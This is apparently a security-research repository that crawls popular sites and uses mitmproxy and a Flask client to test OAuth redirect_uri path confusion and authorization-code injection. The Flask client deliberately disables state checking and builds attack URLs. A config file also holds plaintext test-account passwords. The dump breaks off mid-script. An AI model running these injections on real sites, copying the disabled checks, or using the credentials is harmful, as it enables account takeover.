├── Pathconfusion-attacklist.json ├── requirements.txt ├── convert.sh ├── merge-sites-files.py ├── dump_http.py ├── login.html ├── Idps_info.json ├── attack.html ├── idp_keywords.json ├── generate-sites-files.py ├── Smallsetofsites.json ├── launcher.py ├── facebook.py ├── Start-PathConfusion-exp.py ├── verifysites.js ├── Start-SitesVerification.py ├── tamper_http_header-path_conf.py ├── README.md ├── Pup-Crawler.js └── idps-identification.py /Pathconfusion-attacklist.json: -------------------------------------------------------------------------------- 1 | {"Add_and_Remove1":"/FAKEPATH/", 2 | "Add_and_Remove2":"/FAKEPATH2/" 3 | } -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | beautifulsoup4==4.12.2 2 | Requests==2.31.0 3 | selenium==4.11.2 4 | urllib3==1.26.15 5 | tldextract==3.6.0 6 | Flask-Cors==4.0.0 7 | -------------------------------------------------------------------------------- /convert.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | python3 generate-sites-files.py --sites $1 4 | echo "Generated single JSON files for each site." 5 | 6 | python3 merge-sites-files.py 7 | echo "Merged single JSON files into a single one." 8 | -------------------------------------------------------------------------------- /merge-sites-files.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | __author__ = "Matteo Golinelli" 4 | __copyright__ = "Copyright (C) 2023 Matteo Golinelli" 5 | __license__ = "MIT" 6 | 7 | ''' 8 | Take all the single files in the json folder 9 | and merge them into a list to dump in a single file 10 | ''' 11 | 12 | import glob 13 | import json 14 | 15 | if __name__ == '__main__': 16 | json_files = glob.glob('json/*.json') 17 | 18 | data = [] 19 | for json_file in json_files: 20 | with open(json_file) as f: 21 | data.append(json.load(f)) 22 | 23 | with open('json/sites.json', 'w') as f: 24 | json.dump(data, f) # Note: no indentation here otherwise the file might get extremely big 25 | -------------------------------------------------------------------------------- /dump_http.py: -------------------------------------------------------------------------------- 1 | import json 2 | import os 3 | import sys 4 | 5 | 6 | 7 | def get_headers(headers): 8 | hdrs = {} 9 | 10 | for name, value in headers: 11 | hdrs[name.decode('utf-8')] = value.decode('utf-8') 12 | 13 | return hdrs 14 | 15 | def get_content(content): 16 | if content: 17 | return content.decode('utf-8') 18 | else: 19 | return "No-Content" 20 | 21 | 22 | def response(flow): 23 | print(json.dumps({ 24 | 'request': { 25 | 'timestamp_start': flow.request.timestamp_start, 26 | 'timestamp_end': flow.request.timestamp_end, 27 | 'method': flow.request.method, 28 | 'url': flow.request.url, 29 | 'headers': get_headers(flow.request.headers.fields), 30 | 'content': get_content(flow.request.content) 31 | }, 32 | 'response': { 33 | 'timestamp_start': flow.response.timestamp_start, 34 | 'timestamp_end': flow.response.timestamp_end, 35 | 'status_code': flow.response.status_code, 36 | 'status_text': flow.response.reason, 37 | 'headers': get_headers(flow.response.headers.fields), 38 | 'content': get_content(flow.response.content) 39 | } 40 | })+",", file=sys.stdout) 41 | -------------------------------------------------------------------------------- /login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | {% block title %}{% endblock %}Login with {{ provider }} 4 | 5 | 6 | Home 7 |

Login with {{ provider }}

8 |
9 | 10 | 11 |
12 | 13 |

Authorization request

14 | 15 |
16 | 17 | 18 | 19 |
20 | 21 |
22 | 23 |
24 | 25 | 26 | 27 |
28 | 29 |
30 | 31 |
32 | 33 | 34 | 35 |
36 | -------------------------------------------------------------------------------- /Idps_info.json: -------------------------------------------------------------------------------- 1 | {"facebook.com":{ 2 | "Username":"tommycall.text@gmail.com", 3 | "Password":"Boston2021", 4 | "Fill":{ 5 | "User-Type": "ID", 6 | "Pass-Type": "ID", 7 | "Form-User": "email", 8 | "Form-Pass": "pass" 9 | }, 10 | "Submit":{ 11 | "Button-Type": "ID", 12 | "Button": "loginbutton" 13 | }, 14 | "Grant":{ 15 | "Button-Type": "QuerySelector", 16 | "Button": "div[aria-label*='ontinua']" 17 | } 18 | }, 19 | "twitter.com":{ 20 | "Username":"tommycall.text@gmail.com", 21 | "Password":"Boston2021", 22 | "Fill":{ 23 | "User-Type":"ID", 24 | "Pass-Type":"ID", 25 | "Form-User":"username_or_email", 26 | "Form-Pass":"password" 27 | }, 28 | "Submit":{ 29 | "Button-Type":"ID", 30 | "Button":"allow" 31 | }, 32 | "Grant":{ 33 | "Button-Type":"XPath", 34 | "Button":"//div[contains(@aria-label,'ontinua')]" 35 | } 36 | }, 37 | "line.me":{ 38 | "Username":"tommycall.text@gmail.com", 39 | "Password":"Boston2021", 40 | "Fill":{ 41 | "User-Type":"exception", 42 | "Pass-Type":"exception", 43 | "Form-User":"fill%%Name%%tid%%tommycall.text@gmail.com%%login", 44 | "Form-Pass":"fill%%Name%%tpasswd%%Boston2021%%login" 45 | }, 46 | "Submit":{ 47 | "Button-Type":"XPath", 48 | "Button":"//*[contains(text(), \"Log in\") or contains(@value,'Log in')]" 49 | }, 50 | "Grant":{ 51 | "Button-Type":"XPath", 52 | "Button":"//*[contains(text(), \"Allow\")]" 53 | } 54 | }} -------------------------------------------------------------------------------- /attack.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | {% block title %}{% endblock %}Login with {{ provider }} 4 | 5 | 6 | Home 7 |

Login with {{ provider }}

8 | 9 |

Code & State

10 |

Code {{ code }}

11 | 12 |

State {{ state }}

13 | 14 |

OPP Attack URL

15 | {{ attack_URL }} 16 |
17 | 18 | 19 |

Redeem request

20 | 21 |
22 | 23 | 24 | 25 | 26 |
27 | 28 |
29 | 30 |
31 | 32 | 33 | 34 | 35 |
36 | 37 |
38 | 39 |
40 | 41 | 42 | 43 | 44 |
45 | 46 | 47 | 48 | 60 | -------------------------------------------------------------------------------- /idp_keywords.json: -------------------------------------------------------------------------------- 1 | {"atlassian.com":{"Keywords":["redirect_uri","state","client_id","response_type"],"idphostname":"bitbucket.org","Url_Prefix":["bitbucket.org/site/oauth2/authorize?","bitbucket.org/api/"]}, 2 | "github.com":{"Keywords":["redirect_uri"],"idphostname":"github.com","Url_Prefix":["github.com/login/oauth/authorize?"]}, 3 | "vk.com":{"Keywords":["redirect_uri"],"idphostname":"vk.com","Url_Prefix":["oauth.vk.com/authorize","api.vk.com/oauth/authorize?"]}, 4 | "linkedin.com":{"Keywords":["redirect_uri","state","client_id","response_type"],"idphostname":"linkedin.com","Url_Prefix":["linkedin.com/oauth/v2/authorization?"]}, 5 | "line.me":{"Keywords":["redirect_uri","state","client_id","response_type"],"idphostname":"line.me","Url_Prefix":["access.line.me/oauth2/"]}, 6 | "ok.ru":{"Keywords":["redirect_uri","client_id","response_type"],"idphostname":"ok.ru","Url_Prefix":["connect.ok.ru/oauth/authorize"]}, 7 | "microsoftonline.com":{"Keywords":["redirect_uri","state","client_id","response_type"],"idphostname":"microsoftonline.com","Url_Prefix":["login.microsoftonline.com/common/oauth2/"]}, 8 | "live.com":{"Keywords":["redirect_uri","client_id","response_type"],"idphostname":"live.com","Url_Prefix":["login.live.com/oauth20_authorize.srf"]}, 9 | "facebook.com":{"Keywords":["redirect_uri","client_id"],"idphostname":"facebook.com","Url_Prefix":["/dialog/oauth"]}, 10 | "orcid.org":{"Keywords":["redirect_uri","client_id","response_type"],"idphostname":"orcid.org","Url_Prefix":["orcid.org/oauth/authorize?"]}, 11 | "slack.com":{"Keywords":["redirect_uri","state","client_id"],"idphostname":"slack.com","Url_Prefix":["slack.com/oauth"]}, 12 | "yandex.ru":{"Keywords":["redirect_uri","client_id","response_type"],"idphostname":"yandex.ru","Url_Prefix":["oauth.yandex.ru/authorize"]}, 13 | "yahoo.com":{"Keywords":["redirect_uri","client_id","response_type"],"idphostname":"yahoo.com","Url_Prefix":["api.login.yahoo.com/oauth2/request_auth?"]}, 14 | "reddit.com":{"Keywords":["redirect_uri","state","client_id","response_type"],"idphostname":"reddit.com","Url_Prefix":["/ssl.reddit.com/api/"]}, 15 | "twitter.com":{"Keywords":["oauth_token"],"idphostname":"twitter.com","Url_Prefix":["api.twitter.com/oauth/authenticate"]}, 16 | "kakao.com":{"Keywords":["redirect_uri","client_id","response_type"],"idphostname":"kakao.com","Url_Prefix":["kauth.kakao.com/oauth/authorize"]} 17 | } -------------------------------------------------------------------------------- /generate-sites-files.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | __author__ = "Matteo Golinelli" 4 | __copyright__ = "Copyright (C) 2023 Matteo Golinelli" 5 | __license__ = "MIT" 6 | 7 | import argparse 8 | import logging 9 | import glob 10 | import json 11 | import csv 12 | import os 13 | 14 | ''' 15 | For each site crawled, generate a JSON file with the following structure: 16 | 17 | { 18 | 'site': '', 19 | 'ranking': '', 20 | 'loginpages': [{ 21 | 'loginpage': '', 22 | 'SSOs': [ 23 | { 24 | 'provider': 'google', 25 | 'attributes': [{ 26 | 'name': 'class', 27 | 'value': 'grid--cell s-btn s-btnicon s-btngoogle bar-md ba bc-black-100' 28 | }, { 29 | 'name': 'data-oauthserver', 30 | 'value': 'https://accounts.google.com/o/oauth2/auth' 31 | }, { 32 | 'name': 'data-oauthversion', 33 | 'value': '2.0' 34 | }, { 35 | 'name': 'data-provider', 36 | 'value': 'google' 37 | }], 38 | 'tag': 'button', 39 | 'dompath': '//html/body/div[3]/div[2]/div[1]/div[2]/button[1]' 40 | }, ... 41 | ] 42 | }, ... 43 | ] 44 | } 45 | ''' 46 | 47 | if __name__ == '__main__': 48 | parser = argparse.ArgumentParser(description='Generate JSON files for each site crawled.') 49 | 50 | parser.add_argument('-s', '--sites', help='Tranco ranking csv file', required=True) 51 | parser.add_argument('-d', '--debug', action='store_true', help='Verbose output') 52 | args = parser.parse_args() 53 | 54 | if args.debug: 55 | logging.basicConfig(level=logging.DEBUG) 56 | else: 57 | logging.basicConfig(level=logging.INFO) 58 | 59 | if not os.path.exists('json'): 60 | os.makedirs('json') 61 | 62 | clean_dictionary = { 63 | 'site': '', 64 | 'ranking': '', 65 | 'loginpages': [] 66 | } 67 | 68 | tranco = {} 69 | 70 | with open(args.sites, 'r') as f: 71 | reader = csv.reader(f) 72 | 73 | for row in reader: 74 | tranco[row[1]] = int(row[0]) 75 | 76 | for filename in glob.glob('links/*'): 77 | with open(filename, 'r') as f: 78 | links = json.load(f) 79 | 80 | output = clean_dictionary.copy() 81 | 82 | output['site'] = links['site'] 83 | output['ranking'] = str(tranco[links['site']]) if links['site'] in tranco else '-1' 84 | output['loginpages'] = [] 85 | if len(links['login']) > 0: 86 | for login in links['login']: 87 | idps_loginpage = links['login'][login] 88 | 89 | loginpage = { 90 | 'loginpage': login, 91 | 'SSOs': [] 92 | } 93 | 94 | for provider in idps_loginpage: 95 | data = { 96 | 'provider': provider 97 | } 98 | if 'xpath' in idps_loginpage[provider]: 99 | data['xpath'] = idps_loginpage[provider]['xpath'] 100 | if 'tag' in idps_loginpage[provider]: 101 | data['tag'] = idps_loginpage[provider]['tag'] 102 | if 'url' in idps_loginpage[provider]: 103 | data['url'] = idps_loginpage[provider]['url'] 104 | loginpage['SSOs'].append(data) 105 | 106 | output['loginpages'].append(loginpage) 107 | 108 | with open('json/' + links['site'] + '.json', 'w') as f: 109 | json.dump(output, f, indent=4) 110 | 111 | logging.debug('Done.') 112 | -------------------------------------------------------------------------------- /Smallsetofsites.json: -------------------------------------------------------------------------------- 1 | [{"site": "naver.com", "ranking": "98", "loginpages": [{"loginpage": "https://nid.naver.com/nidlogin.login", "SSOs": [{"provider": "facebook.com", "xpath": "//a/*[contains(text(), \"Facebook\")]", "tag": "Facebook", "url": "https://nid.naver.com/nidlogin.login"}, {"provider": "line.me", "xpath": "//a/*[contains(text(), \"Line\")]", "tag": "Line", "url": "https://nid.naver.com/oauth/global/initSNS.nhn?idp_cd=line&locale=en_US&svctype=1&postDataKey=&url=https%3A%2F%2Fwww.naver.com"}, {"provider": "facebook.com", "xpath": "//a/*[contains(text(), \"Facebook\")]", "tag": "Facebook", "url": "https://nid.naver.com/nidlogin.login"}]}]}, 2 | {"site": "medium.com", "ranking": "68", "loginpages": [{"loginpage": "https://medium.com/m/signin", "SSOs": [{"provider": "twitter.com", "xpath": "//a/*[contains(text(), \"Sign in with Twitter\")]", "tag": "
Sign in with Twitter
", "url": "https://medium.com/m/account/authenticate-twitter?state=twitter-%7Chttps%3A%2F%2Fmedium.com%2F%3Fsource%3Dlogin----------------------------------------%7Clogin&source=login----------------------------------------"},{"provider": "facebook.com", "xpath": "//a/*[contains(text(), \"Sign in with Facebook\")]", "tag": "
Sign in with Facebook
", "url": "https://medium.com/m/connect/facebook?state=facebook-%7Chttps%3A%2F%2Fmedium.com%2F%3Fsource%3Dlogin----------------------------------------%7Clogin&source=login----------------------------------------"}]}]}, 3 | {"site": "wix.com", "ranking": "127", "loginpages": [{"loginpage": "https://users.wix.com/signin?postLogin=https%3A%2F%2Fwww.wix.com%2Fmy-account%2Fsites&view=sign-up&sendEmail=true&loginCompName=Get%20Started%20F1&referralInfo=Get%20Started%20F1", "SSOs": [{"provider": "facebook.com", "xpath": "//button/*[contains(text(), \"Continue with Facebook\")]", "tag": ""}]}]} 4 | ] -------------------------------------------------------------------------------- /launcher.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | __author__ = "Matteo Golinelli" 4 | __copyright__ = "Copyright (C) 2023 Matteo Golinelli" 5 | __license__ = "MIT" 6 | 7 | from time import sleep 8 | 9 | import subprocess 10 | import traceback 11 | import argparse 12 | import logging 13 | import random 14 | import shlex 15 | import json 16 | import sys 17 | import os 18 | 19 | MAX = 5 # Max number of processes to run at once 20 | crawler = 'idps-identification.py' 21 | 22 | # Tested sites 23 | tested = [] 24 | 25 | if __name__ == '__main__': 26 | parser = argparse.ArgumentParser(prog='launcher.py', description='Launch the crawler on a list of sites') 27 | 28 | parser.add_argument('-s', '--sites', 29 | help='Sites list in csv format with two columns ', required=True) 30 | parser.add_argument('-m', '--max', default=MAX, 31 | help=f'Maximum number of sites to test concurrently (default: {MAX})') 32 | parser.add_argument('-a', '--arguments', default='', 33 | help='Additional arguments to pass to the crawler (use with = sign: -a="--arg1 --arg2")') 34 | parser.add_argument('-t', '--testall', default=False, 35 | help='Test also already tested sites', action='store_true') 36 | parser.add_argument('-c', '--crawler', default=crawler, 37 | help='Alternative crawler script name to launch') 38 | parser.add_argument('-d', '--debug', action='store_true', 39 | help='Enable debug mode') 40 | 41 | args = parser.parse_args() 42 | 43 | if args.max: 44 | MAX = int(args.max) 45 | 46 | logging.basicConfig() 47 | logger = logging.getLogger('launcher') 48 | logger.setLevel(logging.INFO) 49 | if args.debug: 50 | logger.setLevel(logging.DEBUG) 51 | 52 | # Retrieve already tested sites from tested.json file 53 | if not args.testall and os.path.exists(f'logs/tested.json'): 54 | with open(f'logs/tested.json', 'r') as f: 55 | tested = json.load(f) 56 | 57 | if len(tested) > 0: 58 | random.shuffle(tested) 59 | logger.info(f'Already tested sites ({len(tested)}): {", ".join(tested[:min(len(tested), 10)])}' + 60 | f'... and {len(tested) - min(len(tested), 10)} more') 61 | 62 | denylist = ['google', 'facebook', 'amazon', 'twitter', '.gov', 'acm.com', 'jstor.org', 'arxiv'] 63 | 64 | sites = [] 65 | try: 66 | with open(args.sites, 'r') as f: 67 | sites = [s.strip() for s in f.readlines()] 68 | 69 | random.shuffle(sites) 70 | 71 | processes = {} 72 | 73 | for site in sites: 74 | if any(i in site for i in denylist): 75 | continue 76 | try: 77 | rank = int(site.strip().split(',')[0]) 78 | site = site.strip().split(',')[1] 79 | 80 | first = True # Execute the loop the first time regardless 81 | # Loop until we have less than MAX processes running 82 | while len(processes) >= MAX or first: 83 | first = False 84 | 85 | for s in processes.keys(): 86 | state = processes[s].poll() 87 | 88 | if state is not None: # Process has finished 89 | del processes[s] 90 | logger.info(f'[{len(tested)}/{len(sites)} ({len(tested)/len(sites)*100:.2f}%)] {s} tested, exit-code: {state}.') 91 | if state == 0: 92 | tested.append(s) 93 | with open(f'logs/tested.json', 'w') as f: 94 | json.dump(tested, f) 95 | break 96 | sleep(1) 97 | 98 | if site in tested and not args.testall: 99 | continue 100 | 101 | # When we have less than MAX processes running, launch a new one 102 | if site != '' and site not in tested: 103 | cmd = f'python3 {args.crawler} -t {site} {args.arguments}' 104 | logger.info(f'Testing {site}') 105 | try: 106 | p = subprocess.Popen(shlex.split(cmd)) 107 | processes[site] = p 108 | 109 | #p = subprocess.Popen(shlex.split('python3 sleep-print.py ' + site)) 110 | #processes[site] = p 111 | 112 | print('\t\t >>>', cmd) 113 | except subprocess.TimeoutExpired as e: 114 | logger.error(f'Timeout expired for {site}') 115 | except subprocess.CalledProcessError as e: 116 | logger.error(f'Could not test site {site}') 117 | except Exception as e: 118 | logger.error(f'Could not test site {site}') 119 | traceback.print_exc() 120 | except Exception as e: 121 | logger.error(f'Error [{site}] {e}') 122 | traceback.print_exc() 123 | except KeyboardInterrupt: 124 | logger.error('Keyboard interrupt') 125 | except: 126 | logger.error(traceback.format_exc()) 127 | finally: 128 | logger.info(f'Tested sites ({len(tested)}): {", ".join(tested[:min(len(tested), 10)])}' + 129 | f'... and {len(tested) - min(len(tested), 10)} more') 130 | with open(f'logs/tested.json', 'w') as f: 131 | json.dump(tested, f) 132 | -------------------------------------------------------------------------------- /facebook.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, Response, request, make_response, redirect, render_template, jsonify 2 | from flask import session as login_session 3 | from flask_cors import CORS 4 | 5 | from urllib.parse import urlparse, urlunparse 6 | import requests 7 | import random 8 | import string 9 | import json 10 | 11 | app = Flask(__name__) 12 | CORS(app) 13 | 14 | DO_NOT_CHECK_STATE = True 15 | 16 | ngrok = 'https://4406-2-37-67-76.ngrok.io' 17 | authorization_base_url = 'https://www.facebook.com/v16.0/dialog/oauth' 18 | token_url = 'https://graph.facebook.com/v16.0/oauth/access_token' 19 | request_url = 'https://graph.facebook.com/v16.0/me' 20 | redirect_uri = f'{ngrok}/login/oauth/authorize' 21 | 22 | client_id = '937387930629121' 23 | client_secret = 'REDACTED' 24 | scope = 'email' 25 | inject_code = '1234567890' 26 | 27 | # Login page 28 | @app.route('/', methods=['GET']) 29 | def show_login(): 30 | """ 31 | Show the login page and create the random state parameter. 32 | If the user is authenticated, redirect to the main page. 33 | """ 34 | print(f'show_login(), session: {login_session}') 35 | if 'access_token' in login_session: 36 | return redirect('/index') 37 | state = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(32)) 38 | login_session['state'] = state 39 | #return jsonify(state=state) 40 | return render_template('login.html', state=state, provider='Facebook') 41 | 42 | # 1. Send initial request to get permissions from the user 43 | @app.route('/handleLogin', methods=["GET"]) 44 | def handleLogin(): 45 | ''' 46 | Make the first request to get authorization from the user. 47 | ''' 48 | # Check if there's a passed callback URL 49 | if 'callback' in request.args: 50 | if request.args.get('callback').startswith('/'): 51 | _redirect_uri = redirect_uri + request.args.get('callback')[1:] 52 | else: 53 | _redirect_uri = redirect_uri + request.args.get('callback') 54 | else: 55 | _redirect_uri = redirect_uri 56 | 57 | # Check that the state parameter is valid 58 | if DO_NOT_CHECK_STATE or login_session['state'] == request.args.get('state'): 59 | # Get the authorization code 60 | url = f'{authorization_base_url}?client_id={client_id}&state={login_session["state"]}' + \ 61 | f'&scope={scope}' + \ 62 | f'&response_type=code' + \ 63 | f'&redirect_uri={_redirect_uri}' 64 | return redirect(url) 65 | else: 66 | return jsonify(invalid_state_token="invalid_state_token") 67 | 68 | # 1. Redeem tests: send authorization request 69 | @app.route('/authorize', methods=["GET"]) 70 | def authorize(): 71 | ''' 72 | Make the first request to get authorization from the user. 73 | ''' 74 | if 'test' in request.args: 75 | test = request.args.get('test') 76 | else: 77 | test = 'genuine' 78 | 79 | _redirect_uri = '' 80 | if test == 'genuine': 81 | _redirect_uri = f'{redirect_uri}' 82 | 83 | elif test == 'code_injection': 84 | _redirect_uri = f'{redirect_uri}%3Fcode%3D{inject_code}' 85 | 86 | elif test == 'code_injection_path_confusion': 87 | _redirect_uri = f'{redirect_uri}/FAKEPATH' 88 | 89 | # Get the authorization code 90 | url = f'{authorization_base_url}?client_id={client_id}&state={login_session["state"]}' + \ 91 | f'&response_type=code' + \ 92 | f'&scope={scope}' + \ 93 | f'&redirect_uri={_redirect_uri}' 94 | return redirect(url) 95 | 96 | # /login/oauth/authorize 97 | #2. Using the /callback route to handle authentication 98 | @app.route('/login/oauth/authorize', methods=['GET', 'POST']) 99 | def handle_callback_login(): 100 | if DO_NOT_CHECK_STATE or login_session['state'] == request.args.get('state'): 101 | if 'state' not in login_session: 102 | return render_template( 103 | 'attack.html', attack_URL='', 104 | provider='Facebook', 105 | code=request.args.get('code'), 106 | state=request.args.get('state') 107 | ) 108 | if 'code' in request.args: 109 | # Create an attack URL to redirect the user to by injecting the received code into the redirect_URI 110 | _redirect_uri = f'{redirect_uri}%3Fcode%3D{request.args.get("code")}' 111 | url = f'{authorization_base_url}?client_id={client_id}&state={login_session["state"]}' + \ 112 | f'&response_type=code' + \ 113 | f'&scope={scope}' + \ 114 | f'&redirect_uri={_redirect_uri}' 115 | return render_template( 116 | 'attack.html', attack_URL=url, 117 | provider='Facebook', 118 | code=request.args.get('code'), 119 | state=request.args.get('state') 120 | ) 121 | else: 122 | return jsonify(error="404_no_code"), 404 123 | else: 124 | return jsonify(invalid_state_token="invalid_state_token") 125 | 126 | @app.route('/redeem', methods=['GET']) 127 | def redeem(): 128 | ''' 129 | Redeem the authorization code for an access token. 130 | ''' 131 | if 'code' in request.args: 132 | if 'test' in request.args: 133 | test = request.args.get('test') 134 | else: 135 | test = 'genuine' 136 | 137 | _redirect_uri = '' 138 | if test == 'genuine': 139 | _redirect_uri = f'{redirect_uri}' 140 | 141 | elif test == 'code_injection': 142 | _redirect_uri = f'{redirect_uri}%3Fcode%3D{inject_code}' 143 | 144 | elif test == 'code_injection_path_confusion': 145 | _redirect_uri = f'{redirect_uri}/FAKEPATH' 146 | 147 | # Redeem the authorization code for an access token 148 | url = f'{token_url}?' + \ 149 | f'client_id={client_id}&client_secret={client_secret}' + \ 150 | f'&code={request.args.get("code")}' + \ 151 | f'&redirect_uri={_redirect_uri}' + \ 152 | f'&grant_type=authorization_code' 153 | r = requests.get(url) 154 | 155 | print(f'redeem: {url}') 156 | 157 | try: 158 | return jsonify(r.json()) 159 | except AttributeError: 160 | app.logger.debug('error redeeming the code') 161 | return jsonify(response=r.text), 500 162 | else: 163 | return jsonify(error="404_no_code"), 404 164 | 165 | # 3. Get user information from GitHub 166 | @app.route('/index') 167 | def index(): 168 | print(f'index, session: {login_session}') 169 | # Check for access_token in session 170 | if 'access_token' not in login_session: 171 | return 'You are not authenticated', 404 172 | 173 | # Retrieve user information from the API 174 | url = request_url 175 | r = requests.get(url, 176 | params={ 177 | 'access_token': login_session['access_token'], 178 | 'client_id': client_id, 179 | 'client_secret': client_secret, 180 | 'redirect_uri': redirect_uri 181 | }) 182 | try: 183 | response = r.json() 184 | return jsonify(response=response) 185 | 186 | except AttributeError: 187 | app.logger.debug('error getting the information') 188 | return "Error retrieving the information", 500 189 | 190 | @app.errorhandler(404) 191 | def page_not_found(e): 192 | return jsonify(request.args), 404 193 | # if 'error' in request.args and 'redirect_uri_mismatch' in request.args.get('error'): 194 | # return jsonify(request.args) 195 | # else: 196 | 197 | if __name__ == '__main__': 198 | app.secret_key = 'super_secret_key' 199 | app.run(debug=True, port=8081) 200 | -------------------------------------------------------------------------------- /Start-PathConfusion-exp.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | from subprocess import PIPE 3 | from subprocess import TimeoutExpired 4 | import urllib.parse 5 | import re,time,json,os,sys 6 | import hashlib 7 | 8 | 9 | def Identify_SSO_idp(idp,SSO): 10 | sso=[] 11 | for i in SSO: 12 | if i["provider"]==idp: 13 | sso.append(i) 14 | return sso 15 | 16 | 17 | if __name__ == "__main__": 18 | #input experiment:Login pages, IDP to test,output folder 19 | sites = json.load(open(sys.argv[1],'r')) 20 | outputfolder=sys.argv[2] 21 | Pathconf=json.load(open(sys.argv[3])) 22 | keyword_Pathconf=json.load(open(sys.argv[4])) 23 | Idp_info=json.load(open(sys.argv[5])) 24 | measurement= "pathconfusion-fixsitesaddremove3" 25 | 26 | #for each site obatin SSO and modify it,run MITM proxy,Run login crawler. 27 | 28 | Site_analyzed=[] 29 | restart=False 30 | start_time = time.time() 31 | #Path output result 32 | main_path=outputfolder 33 | if not os.path.exists(main_path): 34 | os.makedirs(main_path) 35 | else: 36 | print("directory alredy present do not override") 37 | 38 | #for each pathc conf 39 | for p in Pathconf: 40 | print(f'start analyze pathconfusion:{Pathconf[p]}') 41 | #Path output pathconfusion 42 | gen_path=main_path+"/"+p 43 | if not os.path.exists(gen_path): 44 | os.makedirs(gen_path) 45 | else: 46 | print("directory alredy present do not override") 47 | 48 | Site_analyzed=[] 49 | fractionate=0 50 | for site in sites: 51 | if(not site['loginpages']): 52 | print(f'Site{site["site"]} without login pages') 53 | continue 54 | #use to space measurement 55 | fractionate+=1 56 | for l in site['loginpages']: 57 | #no SSO move to next login page 58 | if(len(l["SSOs"])==0):continue 59 | print(f'Test path confusion {p} for idp:{l["SSOs"][0]["provider"]} on site: {site["site"]}') 60 | 61 | accIdP=[] 62 | for k in l["SSOs"]: 63 | if(k["provider"]not in accIdP): 64 | accIdP.append(k["provider"]) 65 | 66 | Idp_sso=[] 67 | for a in accIdP: 68 | Idp_sso.extend(Identify_SSO_idp(a,l["SSOs"])) 69 | 70 | if(Idp_sso==[]):continue 71 | for s in Idp_sso: 72 | refineidp=s["provider"] 73 | Idp=refineidp 74 | commands=[] 75 | pagehash=hashlib.md5((l["loginpage"]+s["xpath"]).encode('utf-8')).hexdigest() 76 | namefile=str(site["site"])+"-"+str(s["provider"])+"-"+str(pagehash) 77 | 78 | if(s["provider"]not in Idp_info.keys()): 79 | print(f'Provider {s["provider"]} not included skipß it') 80 | with open(gen_path+"/"+namefile+"-crawlerlog.txt", 'w') as f: 81 | f.write("IDP not implemented!!!\nRESULT-EXPERIMENT:-1") 82 | continue 83 | 84 | if(s["provider"]not in keyword_Pathconf.keys()): 85 | print(f'Provider {s["provider"]} not included in idps keywords skip it') 86 | with open(gen_path+"/"+namefile+"-crawlerlog.txt", 'w') as f: 87 | f.write("Keywords of IDP not present!!!\nRESULT-EXPERIMENT:-1") 88 | continue 89 | 90 | print(f'Testing site:{site["site"]} idp:{s["provider"]} and path confusion:{Pathconf[p]} in login page: {l["loginpage"]}') 91 | Site_analyzed.append(namefile) 92 | 93 | #build string for mitmproxy 94 | cmd=["mitmdump","--set","listen_port=7777", 95 | "--set","http2=false", 96 | "-s","tamper_http_header-path_conf.py"] 97 | 98 | stream="save_stream_file="+namefile+"-stream" 99 | cmd.append("--set") 100 | cmd.append(stream) 101 | 102 | Idp_keywords=keyword_Pathconf[refineidp]["Keywords"] 103 | Idp_url_prefix=keyword_Pathconf[refineidp]["Url_Prefix"] 104 | 105 | 106 | for k in range(len(Idp_keywords)): 107 | cmd.append("--set") 108 | cmd.append("keywords"+str(k)+"="+str(Idp_keywords[k])) 109 | cmd.append("--set") 110 | cmd.append("inject="+str(Pathconf[p])) 111 | for r in range(len(Idp_url_prefix)): 112 | cmd.append("--set") 113 | cmd.append("linkprefix"+str(r)+"="+str(Idp_url_prefix[r])) 114 | 115 | cmd.append("--set") 116 | cmd.append("idphostname="+str(keyword_Pathconf[refineidp]["idphostname"])) 117 | 118 | print(cmd) 119 | #save command 120 | commands.append("command for proxy:") 121 | commands.append(cmd) 122 | 123 | #start proxy 124 | Proxy_subproc = subprocess.Popen(cmd, stdout=subprocess.PIPE,universal_newlines=True) 125 | print("proxy started") 126 | 127 | time.sleep(2) 128 | #build parameter file for crawler 129 | paramfile="paramfile.json" 130 | paramters={ 131 | "site":l["loginpage"], 132 | "idp": Idp, 133 | "measurement": measurement, 134 | "idp_info":Idp_info[Idp], 135 | "xpath":s["xpath"], 136 | "name":namefile, 137 | "outpath":gen_path+"/" 138 | } 139 | 140 | #save params 141 | commands.append("parameters for crawler:") 142 | commands.append(paramters) 143 | 144 | with open(paramfile, 'w') as f: 145 | json.dump(paramters,f) 146 | 147 | #parameter file 148 | cmd=["node","Pup-Crawler.js"] 149 | cmd.append("--parameters="+paramfile) 150 | 151 | #save command 152 | commands.append("command for crawler:") 153 | commands.append(cmd) 154 | #save command used for the experiment 155 | with open(namefile+"-commands.txt", 'w') as f: 156 | for c in commands: 157 | f.write(str(c)) 158 | f.write('\n') 159 | 160 | #wait to let proxy be ready 161 | time.sleep(2) 162 | 163 | #start crawler 164 | Crawler_subproc = subprocess.Popen(cmd, stdout=subprocess.PIPE,universal_newlines=True) 165 | print("crawler started") 166 | 167 | #wait the crawler to terminate and get return code 168 | try: 169 | crawlresult=Crawler_subproc.wait(timeout=120 ) 170 | except TimeoutExpired: 171 | print("crawler blocked kill it and go ahead") 172 | crawlresult=Crawler_subproc.kill() 173 | print(f'print result crawler:{crawlresult}') 174 | outs=Crawler_subproc.stdout 175 | buff=outs.read() 176 | print(f'output of crawler:{buff}') 177 | #save crawler output 178 | with open(namefile+"-crawlerlog.txt", 'w') as f: 179 | f.write(buff) 180 | 181 | time.sleep(2) 182 | proxyresult = Proxy_subproc.terminate() 183 | print(f'print result PROXY:{proxyresult}') 184 | #obtain proxy log 185 | outs=Proxy_subproc.stdout 186 | buff=outs.read() 187 | print(f'output proxy:{buff}') 188 | 189 | #save mitm files 190 | with open(namefile+"-proxylog.txt", 'w') as f: 191 | f.write(buff) 192 | 193 | #move file to experiment folder 194 | try: 195 | os.rename(namefile+"-crawlerlog.txt", gen_path+"/"+namefile+"-crawlerlog.txt") 196 | os.rename(namefile+"-proxylog.txt", gen_path+"/"+namefile+"-proxylog.txt") 197 | os.rename(namefile+"-stream", gen_path+"/"+namefile+"-stream") 198 | 